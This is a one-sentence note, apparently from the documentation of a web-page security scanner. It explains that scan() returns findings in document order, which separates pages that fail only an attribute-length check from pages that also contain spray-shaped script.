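scan() returns findings in document order, so a page that only fails the attribute-length check and one that also carries spray-shaped script are easy to tell apart when triaging.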